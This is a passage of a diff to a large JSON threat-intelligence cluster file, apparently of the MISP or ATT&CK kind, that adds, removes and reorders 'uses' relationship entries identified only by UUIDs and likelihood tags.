"c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ @@ -15710,6 +17929,34 @@ ], "type": "uses" }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", "tags": [ @@ -15723,6 +17970,34 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "09b2cd76-c674-47cc-9f57-d2f2ad150a46", @@ -15766,63 +18041,7 @@ "type": "uses" }, { - "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15836,14 +18055,14 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15856,27 +18075,6 @@ ], "type": "uses" }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", "tags": [ @@ -15885,28 +18083,35 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -15919,12 +18124,82 @@ ], "type": "uses" }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "92ec0cbd-2c30-44a2-b270-73f4ec949841", @@ -15974,20 +18249,6 @@ ], "type": "uses" }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", "tags": [ @@ -15995,55 +18256,6 @@ ], "type": "uses" }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ @@ -16052,14 +18264,42 @@ "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16072,6 +18312,34 @@ ], "type": "uses" }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "348f1eef-964b-4eb6-bb53-69b3dcb0c643", "tags": [ @@ -16080,7 +18348,14 @@ "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16120,6 +18395,13 @@ ], "type": "uses" }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -16134,13 +18416,6 @@ ], "type": "uses" }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ @@ -16230,6 +18505,20 @@ ], "type": "uses" }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ @@ -16237,6 +18526,20 @@ ], "type": "uses" }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ @@ -16250,34 +18553,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "f6d1d2cb-12f5-4221-9636-44606ea1f3f8", @@ -16320,6 +18595,13 @@ ], "type": "uses" }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "4ae4f953-fe58-4cc8-a327-33257e30a830", "tags": [ @@ -16340,13 +18622,6 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "9ca488bd-9587-48ef-b923-1743523e63b2", @@ -16376,14 +18651,14 @@ "type": "uses" }, { - "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "dest-uuid": "c16e5409-ee53-4d79-afdc-4099dc9292df", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16438,14 +18713,14 @@ "type": "uses" }, { - "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", + "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "dest-uuid": "f72eb8a8-cd4c-461d-a814-3f862befbf00", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16541,14 +18816,14 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16589,6 +18864,27 @@ ], "type": "uses" }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ @@ -16604,7 +18900,14 @@ "type": "uses" }, { - "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16617,40 +18920,12 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "1cc934e4-b01d-4543-a011-b988dfc1a458", @@ -16681,13 +18956,6 @@ ], "type": "uses" }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ @@ -16696,7 +18964,14 @@ "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16717,14 +18992,14 @@ "type": "uses" }, { - "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352", + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16778,20 +19053,6 @@ ], "type": "uses" }, - { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ @@ -16812,6 +19073,20 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "e48df773-7c95-4a4c-ba70-ea3d15900148", @@ -16850,14 +19125,35 @@ "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16870,6 +19166,27 @@ ], "type": "uses" }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "3b3cbbe0-6ed3-4334-b543-3ddfd8c5642d", "tags": [ @@ -16877,6 +19194,20 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ @@ -16892,63 +19223,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -16989,6 +19264,20 @@ ], "type": "uses" }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "62b8c999-dcc0-4755-bd69-09442d9359f5", "tags": [ @@ -17010,26 +19299,12 @@ ], "type": "uses" }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "5c6ed2dc-37f4-40ea-b2e1-4c76140a388c", @@ -17080,13 +19355,6 @@ ], "type": "uses" }, - { - "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", "tags": [ @@ -17100,6 +19368,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "9752aef4-a1f3-4328-929f-b64eb0536090", @@ -17139,7 +19414,7 @@ "type": "uses" }, { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17153,49 +19428,14 @@ "type": "uses" }, { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17209,7 +19449,28 @@ "type": "uses" }, { - "dest-uuid": "ad255bfe-a9e6-4b52-a258-8d3462abe842", + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -17230,14 +19491,28 @@ "type": "uses" }, { - "dest-uuid": "cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + 